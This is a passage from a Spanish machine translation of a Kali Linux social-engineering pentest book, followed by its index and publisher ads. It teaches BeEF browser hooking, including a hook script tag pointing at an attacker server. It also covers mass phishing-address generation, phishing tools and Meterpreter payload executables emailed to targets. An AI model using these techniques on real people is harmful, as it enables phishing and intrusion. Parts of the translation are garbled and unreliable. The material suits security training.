escenario emocionante para el objetivo sobre los beneficios de la acción que queremos que tomen.

También se puede definir como extraer importantes información aplicando la lógica mientras
alguien se comunica con usted de manera inocente.

Habilidades requeridas en un atacante


Las habilidades necesarias para ser un buen atacante comprenden lo siguiente:

• Flujo natural en la comunicación


° Una persona que crea un ambiente tranquilo y confortable al
comunicarse.
° Según la psicología humana, dependiendo de la situación, una persona
puede reaccionar de dos maneras: agresiva y sin problemas.
° Lo mejor que puede hacer el atacante es crear un ambiente tranquilo,
y si comienza a llevarse bien con el objetivo con el que se está
comunicando, la persona comienza a abrirse.

[53]
Comprensión de los ataques de ingeniería social

• Ser genuino
° El atacante debe conocer los detalles del sujeto y lo que debe
comunicarse específicamente al objetivo.
° El atacante no necesita sobreactuar cuando se está comunicando con
el objetivo.

• Ser amigable

° El atacante debe ser amigable por naturaleza y necesita construir


una relación con el objetivo.

Herramientas de prueba de penetración


En esta sección, analizaremos algunas otras herramientas de prueba de penetración que se utilizan
para realizar ataques de ingeniería social para auditorías de seguridad. Estas herramientas son las
siguientes:

• Marco de explotación del navegador (BeEF)


• Marco de Ingeniería Social (SEF)

El marco de explotación del navegador


El Browser Exploitation Framework es una herramienta de prueba de penetración escrita en Ruby
para lanzar ataques del lado del cliente contra un navegador web específico para mostrar tanto la
debilidad del navegador web como para realizar ataques a través del navegador web.

BeEF trabaja en una arquitectura cliente-servidor donde la aplicación del servidor administra los
clientes conectados, también conocida como zombies o objetivo, y JavaScript manos que se
ejecutan en el navegador web de la máquina de destino.

BeEF utiliza las vulnerabilidades del navegador web para obtener el control de la máquina de destino. Se
puede invocar desde el menú como se muestra en la siguiente captura de pantalla:

[54]
Capítulo 4

Una vez que el atacante haya abierto el enlace BeEF en la barra de menú, el servidor BeEF se
ejecutará en la máquina atacante y se abrirá la página de autenticación básica como se
muestra en la siguiente captura de pantalla:

[55]
Comprensión de los ataques de ingeniería social

El nombre de usuario y la contraseña predeterminados son carne de vaca y carne de vaca. Una vez
que podamos autenticar con éxito la cuenta, se nos presentará la siguiente página:

Una vez que el usuario esté autenticado, se le presentará información básica sobre
cómo comenzar con BeEF. Hay dos páginas de demostración disponibles en BeEF
Framework. La página de demostración básica inicial se ve así:

[56]
Capítulo 4

La segunda página de demostración, también conocida como la página de demostración de Butcher, tiene este aspecto:

[57]
Comprensión de los ataques de ingeniería social

El gancho BeEF es un archivo JavaScript alojado en un servidor BeEF y debe ejecutarse en el navegador
de destino. Una vez que este archivo se ejecuta en el navegador de destino, le da al atacante un
mucha información sobre el objetivo. También permite al atacante ejecutar varios módulos
contra el objetivo utilizando BeEF Framework.

Para atacar, necesitamos agregar el gancho de JavaScript en una página web o en una página HTML de la
siguiente manera:

<script src = "http://192.168.1.1:80/hook.js" type = "text / javascript"> </ script>

El gancho también se puede enviar por correo electrónico. Para el ejemplo anterior, haga clic
en la página de demostración básica y automáticamente conectará el navegador web al marco
BeEF.

Ahora ve a Panel de control de BeEF y haga clic en el navegador en línea. Después de un


tiempo, muestra una dirección IP junto con el navegador web y otros detalles como la versión
del sistema operativo, el navegador web y los complementos instalados.

[58]
Capítulo 4

Veamos cómo nuestro BeEF Server podrá capturar algo de la máquina objetivo. Para este
ejemplo, escriba cualquier texto en la página de demostración de BeEF. Como puede ver en
la siguiente captura de pantalla, he escritohola 123:

Ahora veamos el archivo de registro en el control BeEF en el Registros menú. Comprobaremos


si identificó el hacer clic evento a pesar de que no lo envié.

Ahora vuelve a Panel de control y ver en los registros como se ve desde el servidor BeEF.

El marco de la ingeniería social


El Marco de Ingeniería Social (SEF) es una colección de pequeñas utilidades para ayudar a los pentesters
a automatizar el proceso de realizar una pequeña tarea que se requiere durante las pruebas de
penetración de ingeniería social.

[59]
Comprensión de los ataques de ingeniería social

El marco está disponible con instrucciones de instalación en http://spl0it.org/


proyectos / sef.html.

Las siguientes herramientas están incluidas en este marco:

• Sefemails
• Sefphish
• Sefnames
• SefPayload

Sefemails
Sefemails se utiliza para generar una lista de direcciones de correo electrónico con el fin de realizar una Ataque
de phishing masivo contra una organización específica. La sintaxis para ejecutar esta herramienta
en Kali Linux es el siguiente:

Kali @ sefemails -h

El usuario dispondrá de las siguientes opciones:

[60]
Capítulo 4

Ahora recopilemos algunas direcciones de correo electrónico. He usado un archivo de texto que es una colección de
diferentes nombres para este ejemplo. La siguiente captura de pantalla muestra la lista de direcciones de correo
electrónico junto con la sintaxis utilizada para ejecutar esta herramienta:

En la captura de pantalla anterior, el -D La opción se utiliza para especificar el dominio para el que nos
gustaría generar las direcciones de correo electrónico, -norte se utiliza para especificar el archivo que
contiene la lista de diferentes nombres, y -s se utiliza para especificar el esquema.

En general, existen diferentes tipos de esquemas compatibles con esta herramienta, que podrían
ser beneficioso una vez que intentemos recopilar ID de correo electrónico. Como podemos ver en el anterior
captura de pantalla, se ha utilizado un esquema específico de la empresa, por ejemplo, Nombre propio.
apellido@dominio.com para la dirección de correo electrónico del empleado.

Podemos aprender sobre el esquema de la organización a partir de las direcciones de correo electrónico de
los empleados que trabajan en RR.HH. (a veces entregadas con el propósito de reclutar para la organización)
o del personal de atención al cliente. Los diferentes esquemas de soporte utilizados por esta herramienta
son los siguientes:

[Nombre propio] Punto [Apellido] @ Domain.com

Por ejemplo:
Rahul.Patel @ dominio.com
Sachin.Tendulkar @ dominio.com

[Nombre propio] Guion bajo [Apellido] @ Domain.com


[Nombre propio] [Apellido] @ Domain.com

[61]
Comprensión de los ataques de ingeniería social

Sefphish
Sefphish es una herramienta para enviar correos electrónicos de phishing de forma masiva al objetivo. Esta
herramienta utiliza unArchivo de configuración YAML para facilitar el trabajo de un pentester. Laconfig.yaml
El archivo está incluido en el marco. Utiliza un archivo CSV para enviar correos electrónicos de phishing.

Sugerimos usar SET para enviar correos electrónicos de phishing, ya que tiene muchas más opciones para
eludir los mecanismos de seguridad.

Sefnames
La herramienta Sefnames es útil si desea extraer nombres de la lista de direcciones de correo
electrónico. Funciona de forma similar a Sefemail. La única diferencia es que funciona en orden
inverso. La siguiente captura de pantalla muestra la extracción de nombres de una lista de
direcciones de correo electrónico:

La sintaxis básica de Sefnames es la siguiente:

kali @ Sefnames –d dominio -I <input_file> -s <1..3>

Por ejemplo:

Kali @ Sefnames –d www.google.com -i <input_file_name –s 1

El ejemplo anterior mostrará una lista de nombres extraídos de una lista de ID de correo electrónico
presente en un archivo de entrada.

[62]
Capítulo 4

SefPayload
SefPayload se utiliza para generar una carga útil Metasploit Meterpreter que es útil una vez que la
máquina debe verse comprometida. Entonces, SefPayload puede ayudarnos a crear una carga útil
archivo que se puede enviar a varias máquinas de destino a través del correo electrónico utilizando cualquier servidor
de correo local, como SMTP para la plataforma de máquina de Windows y el servidor de correo Postfix.

La sintaxis de SefPayload es la siguiente:

Sefpayload <IP> <puerto> <Nombre del Exe> <Payload>

Las siguientes son las opciones disponibles en SefPayload:

• La opción de dirección IP (-I) se utiliza para definir la dirección IP del Metasploit


servidor, normalmente la máquina atacante.

• La opción de puerto (-p <número de puerto>) le dará el número de puerto desde donde el
servidor está escuchando la conexión remota. El puerto predeterminado es 443.

• El nombre de la opción de archivo ejecutable (-o) da el nombre de archivo del archivo .exe que se va a
crear. El nombre de archivo predeterminado esMS.exe.

• La -v La opción muestra la información de la versión.


• La -h La opción muestra la información de ayuda.

El siguiente comando muestra un ejemplo de SefPayload:

kali @ Sefpayload - I 127.0.0.1

Este comando iniciará un servidor de escucha en la máquina atacante; sin


embargo, se sugiere que utilice Metasploit Framework, ya que le da al pentester
más opciones.

Defensa
Defender una red empresarial contra objetivos APT (amenaza persistente
avanzada) es implementar una serie de controles en capas.

Las tres áreas específicas de control que deben considerarse son:

• Gestión de eventos de incidentes de seguridad: Esta es una herramienta valiosa para


combatir las APT. Algunos de los software recomendados que brindan dichos servicios
son el centro de registro de Tripwire, IBM Security QRadar, McAfee Global Threat
Intelligence.

[63]
• Sistema de prevención de fugas / pérdida de datos: Esto está diseñado para detectar posibles violaciones de
datos mediante el monitoreo y el bloqueo de datos confidenciales mientras están en uso, en movimiento (viajando
a través de la red) o en el almacenamiento de datos.

• Proveedor de filtrado de contenido: Esto brinda protección contra ataques de phishing y


otras amenazas basadas en la web y por correo electrónico. La conciencia del usuario debe
ser integral para defenderse de estos ataques.

Resumen
En este capítulo, hemos cubierto varios tipos de ataques que incluyen ataques
tanto técnicos como no técnicos. También hemos aprendido cómo, con
Con la ayuda del navegador, podemos infiltrarnos en cualquier red segura y cómo no es demasiado
difícil generar direcciones de correo electrónico con la ayuda de herramientas de automatización.

Hemos cubierto cómo se puede robar una identidad (robo de identidad) y hemos aprendido
brevemente sobre BeEF y el marco de ingeniería social de código abierto. También tenemos
contramedidas brevemente mencionadas contra estos ataques, siendo consciente de lo que
información está disponible y qué software puede utilizar para protegerse.
Índice
Simbolos D
- d opción 61 Denegación de servicio distribuida (DDoS) 43
buceo en contenedores 8
A
mi
Ataques de amenaza persistente avanzada (APT) 24
subprograma 31 Escuchas a escondidas 8
agresor E-bomba 42
habilidades 53 Elicitación 53
ataques Ataque de correo electrónico Ataque de envío masivo 43 Ataque de

Amenaza persistente avanzada (APT) ataca 24 correo electrónico Dirección de correo electrónico única

defensa contra 36 ataque 43


Vector de ataque de spear-phishing 24 ingeniería 6
Método de ataque de secuestro web 20, 22 salir de la fase 7
explotar 38
B
H
Payload ejecutable backdoored (BEST) 41
Marco de explotación del navegador (BeEF) fase de gancho 7
54-59 ingeniería social basada en humanos
alrededor de 7

C contenedor de basura 8
Escuchas a escondidas 8
ingeniería social basada en computadora haciéndose pasar por 8
alrededor de 9, 10
usuario final legítimo, haciéndose
ataque interno 9 pasar 8 a cuestas 8
phishing 10 ingeniería social inversa 8
ventanas emergentes 9
ataque de ingeniería social, mediante falsificación
I
SMS 10
ingeniería social basada en computadora, herramientas identidad
Kit de herramientas de ingeniería social (SET) 10-12 robar 52
Clonación de sitios web 12-16 robo 52
reemplazo de iframe 20 habilidades 54

haciéndose pasar por 8 Marco de Ingeniería Social (SEF) 59


información phishing 10
clasificando 17 llevar a cuestas 8
jugar la fase 7
J política 16
ventanas emergentes 9
Ataque de applet de Java 31-35
Entorno de ejecución de Java (JRE) 31
R
L fase de investigación 7
ingeniería social inversa 8
oyente
creando 38-40 S
METRO politica de seguridad
alrededor de 16
ataque de correo masivo 42 información del sistema de respuesta
Metasploit Framework a incidentes 17, clasificación 17
URL 27 contraseña, políticas 17
Meterpreter 30, 38 entrenamiento 17

Herramienta Sefemails 60, 61


norte Herramienta Sefnames 62

Herramienta SefPayload 63
Traducción de direcciones de red (NAT) 33
Herramienta Sefphish 62
419scam nigeriano 10
COLOCAR

O alrededor de 10, 11

actualización 20

Laboratorio Nacional Oak Ridge 6 carga útil de solteros 38, 41 ataque de

suplantación de identidad por SMS

PAG alrededor de 45-48

plantilla predefinida 49, 50


contraseñas 17 social 6
cargas útiles Ingeniería social
creando 37-41 fases 6
tipos 38 tipos 7
cargas útiles, tipos URL 6
meterpreter 38 Marco de Ingeniería Social) 59
solteros 38 ingeniería social, fases
stagers 38 salida 7
herramientas de prueba de penetración gancho 7
Marco de explotación del navegador 54-59 jugar 7
Sefemails 60, 61 investigación 7
Sefnames 62 ingenieria social, tipos
SefPayload 63 alrededor de 7

Sefphish 62 ingeniería social basada en computadora 9, 10


ingeniería social basada en humanos 7, 8

[66]
Kit de herramientas de ingeniería social.
Ver SET Vector de ataque de spear-
phishing 24-30 carga útil 38, 41
etapas de carga útil 41

T
entrenamiento 17

V
vulnerabilidad 37

W
Método de ataque de secuestro web 20-22
Vectores de ataque de sitio web 14

Z
vulnerabilidad día cero 6

[67]
Gracias por comprar
Ingeniería social Kali Linux

Acerca de Packt Publishing


Packt, pronunciado 'empaquetado', publicó su primer libro "Dominar phpMyAdmin para una gestión eficaz
de MySQL " en abril de 2004 y posteriormente continuó especializándose en la publicación
libros muy enfocados en tecnologías y soluciones específicas.

Nuestros libros y publicaciones comparten las experiencias de sus compañeros profesionales de TI en la adaptación y
personalización de los sistemas, aplicaciones y marcos actuales. Nuestros libros basados en soluciones le brindan el
conocimiento y el poder para personalizar el software y las tecnologías que está utilizando
para hacer el trabajo. Los libros de paquetes son más específicos y menos generales que los libros de TI que tiene
visto en el pasado. Nuestro modelo de negocio único nos permite brindarle información más
enfocada, brindándole más de lo que necesita saber y menos de lo que no.

Packt es una empresa editorial moderna pero única, que se centra en producir libros de vanguardia de
calidad para comunidades de desarrolladores, administradores y novatos por igual. Para obtener más
información, por favor visite nuestro sitio web:www.packtpub.com.

Acerca de Packt Open Source


En 2010, Packt lanzó dos nuevas marcas, Packt Open Source y Packt Enterprise, para continuar su enfoque en
la especialización. Este libro es parte de la marca Packt Open Source, que alberga libros publicados sobre
software creado en torno a licencias de código abierto y ofrece información a todo el mundo, desde
desarrolladores avanzados hasta diseñadores web en ciernes. La marca de código abierto también ejecuta el
plan de regalías de código abierto de Packt, mediante el cual Packt otorga regalías a cada proyecto de código
abierto sobre cuyo software se vende un libro.

Escribiendo para Packt


Damos la bienvenida a todas las consultas de personas interesadas en la autoría. Las propuestas de libros deben
enviarse aauthor@packtpub.com. Si la idea de su libro aún se encuentra en una etapa temprana y
quisiera discutirlo primero antes de escribir una propuesta formal de libro, contáctenos; uno de nosotros
los editores encargados se pondrán en contacto con usted.

No solo buscamos autores publicados; Si tiene sólidas habilidades técnicas pero no tiene experiencia en redacción,
nuestros editores experimentados pueden ayudarlo a desarrollar una carrera de redacción, o simplemente obtener una
recompensa adicional por su experiencia.
Libro de cocina de Kali Linux
ISBN: 978-1-78328-959-2 Tapa blanda: 260 páginas

Más de 70 recetas que le ayudarán a dominar Kali Linux para


realizar pruebas de seguridad de penetración efectivas

1. Recetas diseñadas para educarlo ampliamente sobre los


principios de las pruebas de penetración y las herramientas de
Kali Linux.

2. Aprender a usar las herramientas de Kali Linux, como


Metasploit, Wire Shark y muchas más a través de
instrucciones detalladas y estructuradas

3. Enseñándole con un estilo fácil de seguir, lleno de ejemplos,


ilustraciones y consejos que se adaptarán tanto a expertos
como a principiantes.

Kali Linux instantáneo


ISBN: 978-1-84969-566-4 Tapa blanda: 68 páginas

Una guía rápida para conocer el sistema operativo más


utilizado por los profesionales de la seguridad de redes

1. ¡Aprenda algo nuevo en un instante! Una guía breve,


rápida y enfocada que brinda resultados inmediatos

2. Cubre más de 30 herramientas diferentes incluidas


en Kali Linux

3. Guía sencilla para configurar e instalar Kali Linux en


diferentes conjuntos de hardware

4. Ejemplos paso a paso para comenzar con las


herramientas de prueba de lápiz

por favor, compruebe www.PacktPub.com para obtener información sobre nuestros títulos
Pruebas de penetración web con Kali
Linux
ISBN: 978-1-78216-316-9 Tapa blanda: 342 páginas

Una guía práctica para implementar estrategias de pruebas


de penetración en sitios web, aplicaciones web y protocolos
web estándar con Kali Linux

1. Aprenda los conceptos clave de reconocimiento necesarios como


probador de penetración

2. Atacar y explotar funciones clave, autenticación y


sesiones en aplicaciones web

3. Aprenda a proteger sistemas, redactar informes y


vender servicios de pruebas de penetración web

BackTrack 4: Garantizar la seguridad


por prueba de penetración
ISBN: 978-1-84951-394-4 Tapa blanda: 392 páginas

Domina el arte de las pruebas de penetración con BackTrack

1. Aprenda el arte negro de las pruebas de penetración


con una cobertura en profundidad de la distribución
BackTrack Linux

2. Explore la información y la importancia de probar sus


sistemas de red corporativa antes de que los piratas
informáticos lo ataque

3. Comprender el espectro práctico de la seguridad.


herramientas por su uso, configuración y
beneficios ejemplares

por favor, compruebe www.PacktPub.com para obtener información sobre nuestros títulos

~StormRG ~

También podría gustarte